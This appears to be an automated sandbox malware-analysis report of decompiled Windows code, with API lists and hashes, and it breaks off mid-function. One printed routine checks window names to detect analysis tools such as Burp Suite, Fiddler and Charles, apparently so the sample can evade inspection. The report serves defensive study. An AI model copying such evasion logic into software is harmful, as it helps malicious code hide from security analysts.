                                                                                                                                                                  0x10011948
                                                                                                                                                                  0x10011950
                                                                                                                                                                  0x10011950

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000EA1D), ref: 1001193C
                                                                                                                                                                  • __mtterm.LIBCMT ref: 10011948
                                                                                                                                                                    • Part of subcall function 10011620: __decode_pointer.LIBCMT ref: 10011631
                                                                                                                                                                    • Part of subcall function 10011620: TlsFree.KERNEL32(00000020,10011AB5), ref: 1001164B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001195E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001196B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10011978
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10011985
                                                                                                                                                                  • TlsAlloc.KERNEL32 ref: 100119D5
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000), ref: 100119F0
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 100119FA
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A05
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A15
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A25
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A35
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A56
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 10011A6F
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A89
                                                                                                                                                                  • __initptd.LIBCMT ref: 10011A98
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10011A9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                  • API String ID: 2657569430-3819984048
                                                                                                                                                                  • Opcode ID: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction ID: 808ad0af3f4b6be62188e372f3d3457f3cdf16e918fc8b475f3418519981f6d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction Fuzzy Hash: 16318F358042219AE709EF76ACC56893AB9EB84296F52062AF569DF1E3DF31D4C09B10
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042465F, Relevance: 40.5, APIs: 12, Strings: 11, Instructions: 234synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                                                  			E0042465F(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void*** _a12) {
				long _v8;
				void* __edi;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t56;
				void* _t57;
				signed short _t80;
				signed short _t84;
				signed short _t87;
				signed short _t90;
				signed short _t93;
				WCHAR* _t99;
				void** _t108;
				void* _t113;
				void* _t131;
				void* _t132;

				_t98 = __ebx;
				_v8 = 0;
				_t108 = E00431078(0x18, 1);
				if(_t108 != 0) {
					_push(__ebx);
					_t99 = _a8;
					_t48 = CreateEventW(0, 0, 0, _t99);
					_t108[1] = _t48;
					if(_t48 != 0) {
						_t50 = E00433CEA( &_v8, L"%ls_send", _t99);
						_t132 = _t131 + 0xc;
						if(_t50 >= 0) {
							_t52 = CreateEventW(0, 0, 0, _v8);
							_t108[2] = _t52;
							if(_t52 != 0) {
								_t113 = E00433CEA( &_v8, L"%ls_mutex", _t99);
								_t132 = _t132 + 0xc;
								if(_t113 >= 0) {
									_t55 = CreateMutexW(0, 1, _v8);
									_t108[3] = _t55;
									if(_t55 != 0) {
										_t56 = CreateFileMappingW(0xffffffff, 0, 4, 0, 0x10000, _a4);
										 *_t108 = _t56;
										if(_t56 != 0) {
											_t57 = MapViewOfFile(_t56, 2, 0, 0, 0);
											_t108[4] = _t57;
											if(_t57 != 0) {
												_t113 = E0041CDDB(_t57 + 0x21a, 0x104, _t99);
												if(_t113 >= 0) {
													 *(_t108[4]) = 0;
													 *((char*)(_t108[4] + 0x218)) = 0;
													 *((intOrPtr*)(_t108[4] + 4)) = 0x8000000a;
													 *((char*)(_t108[4] + 2)) = 0;
													 *((char*)(_t108[4] + 1)) = 0;
													 *((char*)(_t108[4] + 0x219)) = 0;
													 *((intOrPtr*)(_t108[4] + 8)) = 0x8000000a;
													 *((char*)(_t108[4] + 3)) = 0;
													 *((intOrPtr*)(_t108[4] + 0xc)) = 0;
													 *((char*)(_t108[4] + 0x422)) = 1;
													 *((intOrPtr*)(_t108[4] + 0x424)) = 0;
													 *((intOrPtr*)(_t108[4] + 0x428)) = 0;
													 *((intOrPtr*)(_t108[4] + 0x42c)) = 0;
													ReleaseMutex(_t108[3]);
													 *_a12 = _t108;
													_t108 = 0;
												} else {
													_push("failed to copy event name to shared memory structure.");
													goto L20;
												}
											} else {
												_t80 = GetLastError();
												_t118 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
												_t113 =  >=  ? 0x80004005 :  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
												E004300D9(0x80004005, "NetFxChainer.cpp", 0x50, _t113);
												_push(_a4);
												_push("Failed to MapViewOfFile for %ls.");
												goto L17;
											}
										} else {
											_t84 = GetLastError();
											_t121 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
											_t113 =  >=  ? 0x80004005 :  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
											E004300D9(0x80004005, "NetFxChainer.cpp", 0x49, _t113);
											_push(_a4);
											_push("Failed to memory map cabinet file: %ls");
											goto L17;
										}
									} else {
										_t87 = GetLastError();
										_t124 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
										_t113 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
										E004300D9(0x80004005, "NetFxChainer.cpp", 0x41, _t113);
										_push(_v8);
										_push("Failed to create mutex: %ls");
										goto L17;
									}
								} else {
									_push("failed to allocate memory for mutex name");
									goto L20;
								}
							} else {
								_t90 = GetLastError();
								_t127 =  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
								_t113 =  >=  ? 0x80004005 :  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
								E004300D9(0x80004005, "NetFxChainer.cpp", 0x3a, _t113);
								_push(_v8);
								goto L8;
							}
						} else {
							_push("failed to allocate memory for event name");
							L20:
							_push(_t113);
							E00430A57();
						}
					} else {
						_t93 = GetLastError();
						_t130 =  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
						_t113 =  >=  ? 0x80004005 :  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "NetFxChainer.cpp", 0x34, _t113);
						_push(_t99);
						L8:
						_push("Failed to create event: %ls");
						L17:
						_push(_t113);
						E00430A57();
					}
					_pop(_t98);
				} else {
					_t113 = 0x8007000e;
					E004300D9(_t47, "NetFxChainer.cpp", 0x31, 0x8007000e);
					_push("Failed to allocate memory for NetFxChainer struct.");
					_push(0x8007000e);
					E00430A57();
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				if(_t108 != 0) {
					if(_t108[3] != 0) {
						ReleaseMutex(_t108[3]);
					}
					E0042492E(_t98, _t108, _t108);
				}
				return _t113;
			}





















                                                                                                                                                                  0x0042465f
                                                                                                                                                                  0x0042466b
                                                                                                                                                                  0x00424673
                                                                                                                                                                  0x00424677
                                                                                                                                                                  0x0042469d
                                                                                                                                                                  0x0042469e
                                                                                                                                                                  0x004246a5
                                                                                                                                                                  0x004246ab
                                                                                                                                                                  0x004246b0
                                                                                                                                                                  0x004246ea
                                                                                                                                                                  0x004246f1
                                                                                                                                                                  0x004246f6
                                                                                                                                                                  0x0042470a
                                                                                                                                                                  0x00424710
                                                                                                                                                                  0x00424715
                                                                                                                                                                  0x0042475e
                                                                                                                                                                  0x00424760
                                                                                                                                                                  0x00424765
                                                                                                                                                                  0x00424779
                                                                                                                                                                  0x0042477f
                                                                                                                                                                  0x00424784
                                                                                                                                                                  0x004247cc
                                                                                                                                                                  0x004247d2
                                                                                                                                                                  0x004247d6
                                                                                                                                                                  0x00424813
                                                                                                                                                                  0x00424819
                                                                                                                                                                  0x0042481e
                                                                                                                                                                  0x00424872
                                                                                                                                                                  0x00424876
                                                                                                                                                                  0x0042488c
                                                                                                                                                                  0x00424896
                                                                                                                                                                  0x0042489f
                                                                                                                                                                  0x004248a5
                                                                                                                                                                  0x004248ab
                                                                                                                                                                  0x004248b1
                                                                                                                                                                  0x004248ba
                                                                                                                                                                  0x004248c0
                                                                                                                                                                  0x004248c6
                                                                                                                                                                  0x004248cc
                                                                                                                                                                  0x004248d6
                                                                                                                                                                  0x004248df
                                                                                                                                                                  0x004248e8
                                                                                                                                                                  0x004248f1
                                                                                                                                                                  0x004248fa
                                                                                                                                                                  0x004248fc
                                                                                                                                                                  0x00424878
                                                                                                                                                                  0x00424878
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424878
                                                                                                                                                                  0x00424820
                                                                                                                                                                  0x00424820
                                                                                                                                                                  0x00424831
                                                                                                                                                                  0x0042483b
                                                                                                                                                                  0x00424846
                                                                                                                                                                  0x0042484b
                                                                                                                                                                  0x0042484e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042484e
                                                                                                                                                                  0x004247d8
                                                                                                                                                                  0x004247d8
                                                                                                                                                                  0x004247e9
                                                                                                                                                                  0x004247f3
                                                                                                                                                                  0x004247fe
                                                                                                                                                                  0x00424803
                                                                                                                                                                  0x00424806
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424806
                                                                                                                                                                  0x00424786
                                                                                                                                                                  0x00424786
                                                                                                                                                                  0x00424797
                                                                                                                                                                  0x004247a1
                                                                                                                                                                  0x004247ac
                                                                                                                                                                  0x004247b1
                                                                                                                                                                  0x004247b4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004247b4
                                                                                                                                                                  0x00424767
                                                                                                                                                                  0x00424767
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424767
                                                                                                                                                                  0x00424717
                                                                                                                                                                  0x00424717
                                                                                                                                                                  0x00424728
                                                                                                                                                                  0x00424732
                                                                                                                                                                  0x0042473d
                                                                                                                                                                  0x00424742
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00424742
                                                                                                                                                                  0x004246f8
                                                                                                                                                                  0x004246f8
                                                                                                                                                                  0x0042487d
                                                                                                                                                                  0x0042487d
                                                                                                                                                                  0x0042487e
                                                                                                                                                                  0x00424884
                                                                                                                                                                  0x004246b2
                                                                                                                                                                  0x004246b2
                                                                                                                                                                  0x004246c3
                                                                                                                                                                  0x004246cd
                                                                                                                                                                  0x004246d8
                                                                                                                                                                  0x004246dd
                                                                                                                                                                  0x00424745
                                                                                                                                                                  0x00424745
                                                                                                                                                                  0x00424853
                                                                                                                                                                  0x00424853
                                                                                                                                                                  0x00424854
                                                                                                                                                                  0x00424859
                                                                                                                                                                  0x004248fe
                                                                                                                                                                  0x00424679
                                                                                                                                                                  0x00424679
                                                                                                                                                                  0x00424686
                                                                                                                                                                  0x0042468b
                                                                                                                                                                  0x00424690
                                                                                                                                                                  0x00424691
                                                                                                                                                                  0x00424697
                                                                                                                                                                  0x00424903
                                                                                                                                                                  0x00424908
                                                                                                                                                                  0x00424908
                                                                                                                                                                  0x0042490f
                                                                                                                                                                  0x00424915
                                                                                                                                                                  0x0042491a
                                                                                                                                                                  0x0042491a
                                                                                                                                                                  0x00424921
                                                                                                                                                                  0x00424921
                                                                                                                                                                  0x0042492b

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,00424D81,?,?,?), ref: 004246A5
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00424D81,?,?,?), ref: 004246B2
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0042491A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocCreateErrorEventLastMutexProcessRelease
                                                                                                                                                                  • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                                  • API String ID: 1118593306-2991465304
                                                                                                                                                                  • Opcode ID: 52dfdd44334eb726864d88ef9ab925c313f4e4dceadc902ceb67258f2fdeeaab
                                                                                                                                                                  • Instruction ID: 5692cc44a49f86214c9be3405e521a419977a862ad3b0571153b2ab1a861b75e
                                                                                                                                                                  • Opcode Fuzzy Hash: 52dfdd44334eb726864d88ef9ab925c313f4e4dceadc902ceb67258f2fdeeaab
                                                                                                                                                                  • Instruction Fuzzy Hash: 2171B076B41721BBE7119B65AC49F9BBAE4FF08350F114266FD04A7290D768D800CAEC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10019430, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019430(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAD0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019390(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019390(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019390(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019390(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019390(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAD0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAD0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019390(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAD0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAD0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019390(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10335dcc = 1;
												return 0;
											}
											_t53 = E10019390(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10335dcc = 1;
											return 0;
										}
										_t55 = E10019390(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10335dcc = 1;
										return 0;
									}
									_t57 = E10019390(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10335dcc = 1;
									return 0;
								}
								__eflags = E1000CAD0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019390(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10335dcc = 1;
								return 0;
							}
							 *0x10335dcc = 1;
							return 0;
						}
						 *0x10335dcc = 1;
						return 0;
					}
					 *0x10335dcc = 1;
					return 0;
				}
				_t66 = E1000CAD0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019390(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10335dcc = 1;
					return 0;
				}
			}


































                                                                                                                                                                  0x10019430
                                                                                                                                                                  0x10019430
                                                                                                                                                                  0x10019439
                                                                                                                                                                  0x1001944e
                                                                                                                                                                  0x10019456
                                                                                                                                                                  0x1001946b
                                                                                                                                                                  0x10019483
                                                                                                                                                                  0x10019499
                                                                                                                                                                  0x100194a6
                                                                                                                                                                  0x100194ab
                                                                                                                                                                  0x100194ae
                                                                                                                                                                  0x100194b0
                                                                                                                                                                  0x10019700
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019700
                                                                                                                                                                  0x100194c2
                                                                                                                                                                  0x100194c7
                                                                                                                                                                  0x100194cc
                                                                                                                                                                  0x1001951b
                                                                                                                                                                  0x10019520
                                                                                                                                                                  0x10019523
                                                                                                                                                                  0x10019525
                                                                                                                                                                  0x10019549
                                                                                                                                                                  0x1001954e
                                                                                                                                                                  0x10019551
                                                                                                                                                                  0x10019553
                                                                                                                                                                  0x10019577
                                                                                                                                                                  0x1001957c
                                                                                                                                                                  0x1001957f
                                                                                                                                                                  0x10019581
                                                                                                                                                                  0x100195a5
                                                                                                                                                                  0x100195aa
                                                                                                                                                                  0x100195ad
                                                                                                                                                                  0x100195af
                                                                                                                                                                  0x100195f9
                                                                                                                                                                  0x100195fe
                                                                                                                                                                  0x10019601
                                                                                                                                                                  0x10019603
                                                                                                                                                                  0x10019633
                                                                                                                                                                  0x1001963a
                                                                                                                                                                  0x1001963f
                                                                                                                                                                  0x10019642
                                                                                                                                                                  0x10019644
                                                                                                                                                                  0x10019674
                                                                                                                                                                  0x10019680
                                                                                                                                                                  0x10019685
                                                                                                                                                                  0x10019688
                                                                                                                                                                  0x1001968a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019693
                                                                                                                                                                  0x10019698
                                                                                                                                                                  0x1001969b
                                                                                                                                                                  0x1001969d
                                                                                                                                                                  0x100196c7
                                                                                                                                                                  0x100196d6
                                                                                                                                                                  0x100196d8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196e6
                                                                                                                                                                  0x100196ee
                                                                                                                                                                  0x100196f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196f2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196fc
                                                                                                                                                                  0x100196ab
                                                                                                                                                                  0x100196b0
                                                                                                                                                                  0x100196b3
                                                                                                                                                                  0x100196b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196b7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100196c1
                                                                                                                                                                  0x10019652
                                                                                                                                                                  0x10019657
                                                                                                                                                                  0x1001965a
                                                                                                                                                                  0x1001965c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001965e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019668
                                                                                                                                                                  0x10019611
                                                                                                                                                                  0x10019616
                                                                                                                                                                  0x10019619
                                                                                                                                                                  0x1001961b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001961d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019627
                                                                                                                                                                  0x100195c0
                                                                                                                                                                  0x100195c2
                                                                                                                                                                  0x100195ed
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100195ed
                                                                                                                                                                  0x100195d0
                                                                                                                                                                  0x100195d8
                                                                                                                                                                  0x100195da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100195dc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100195e6
                                                                                                                                                                  0x10019583
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001958d
                                                                                                                                                                  0x10019555
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001955f
                                                                                                                                                                  0x10019527
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019531
                                                                                                                                                                  0x100194d5
                                                                                                                                                                  0x100194dd
                                                                                                                                                                  0x100194df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100194f9
                                                                                                                                                                  0x100194f9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019503

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001944E
                                                                                                                                                                  • _memset.LIBCMT ref: 1001946B
                                                                                                                                                                  • GetClassNameA.USER32(?,00000000,00000104), ref: 10019483
                                                                                                                                                                  • GetWindowTextA.USER32 ref: 10019499
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194A6
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 1001939B
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 100193A9
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194D5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                                  • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                                  • API String ID: 1565133231-1140939848
                                                                                                                                                                  • Opcode ID: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
                                                                                                                                                                  • Instruction ID: 51e88d16b42fffacdf90acd9036bc3218a7670d11f06c4b4a6332502e68566f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
                                                                                                                                                                  • Instruction Fuzzy Hash: 7851B6B991430956E710CB71AC89FDA72B8EB20345F440864F91ADD182FBB1F7C8CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401BD3, Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 299COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E00401BD3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed short _a8, intOrPtr _a12, signed short* _a16) {
				signed int _v8;
				signed short _v16;
				struct _OSVERSIONINFOW _v292;
				signed short* _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				intOrPtr _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed short _v408;
				intOrPtr _v564;
				intOrPtr _v1260;
				signed short _v1276;
				char _v1336;
				intOrPtr _v1464;
				intOrPtr _v1476;
				intOrPtr _v1496;
				char _v1520;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t70;
				signed short _t82;
				signed short _t85;
				signed short _t87;
				signed short _t89;
				signed short _t92;
				signed short _t102;
				intOrPtr _t123;
				signed short _t130;
				signed short _t133;
				signed short _t139;
				void* _t142;
				signed int _t143;
				void* _t149;
				signed short _t150;
				signed short* _t151;
				intOrPtr _t152;
				signed short _t153;
				signed short _t164;
				signed short _t167;
				signed int _t168;
				void* _t169;
				void* _t170;

				_t149 = __edx;
				_t144 = __ecx;
				_t70 =  *0x4560d0; // 0xae480e18
				_v8 = _t70 ^ _t168;
				_t150 = _a8;
				_v312 = _a4;
				_push(0x11c);
				_v296 = _a16;
				_push(0);
				_push( &_v292);
				_v300 = 0;
				_v320 = 0;
				_v328 = 0;
				_v324 = 0;
				_v316 = 0;
				E004267C0(_t142, __ecx, _t150, 0, __eflags);
				_push(0x4a8);
				_push(0);
				_push( &_v1520);
				_v304 = 0;
				_v308 = 0;
				_t143 = 0;
				E004267C0(0, __ecx, _t150, 0, __eflags);
				_t170 = _t169 + 0x18;
				if(E00401036(__eflags,  &_v1520) >= 0) {
					_v1476 = _a12;
					E00430EB8(3, 0);
					_t82 = E00402019();
					__imp__CoInitializeEx(0, 0);
					__eflags = _t82;
					if(_t82 >= 0) {
						_v300 = 1;
						E00430D08(GetModuleHandleW(0));
						_v320 = 1;
						_t85 = E00432369();
						_t161 = _t85;
						__eflags = _t85;
						if(__eflags >= 0) {
							_v328 = _v300;
							_t87 = E0043541A(_t144, _t149, _t161, __eflags);
							__eflags = _t87;
							if(_t87 >= 0) {
								_v324 = _v300;
								_t89 = E00435DCA(_v300);
								__eflags = _t89;
								if(_t89 >= 0) {
									_v316 = _v300;
									_v292.dwOSVersionInfoSize = 0x11c;
									_t92 = GetVersionExW( &_v292);
									__eflags = _t92;
									if(_t92 != 0) {
										E00431C19( &_v304, 0);
										__eflags = _t150;
										_t96 =  !=  ? _t150 : 0x43b580;
										_push( !=  ? _t150 : 0x43b580);
										_push(_v304);
										_push(_v16 & 0x0000ffff);
										_push(_v292.dwBuildNumber);
										_push(_v292.dwMinorVersion);
										_push(_v292.dwMajorVersion);
										E00402003(2, 0x20000001, "3.8.1128.0");
										_t170 = _t170 + 0x24;
										__eflags = _v304;
										if(__eflags != 0) {
											E004380AB(_v304);
											_t37 =  &_v304;
											 *_t37 = _v304 & 0;
											__eflags =  *_t37;
										}
										_t164 = E00411570(_t143, _t144, _t149, __eflags, _t150,  &_v1520);
										__eflags = _t164;
										if(_t164 >= 0) {
											_t102 = _v408;
											__eflags = _t102;
											if(_t102 == 0) {
												_v308 = _v300;
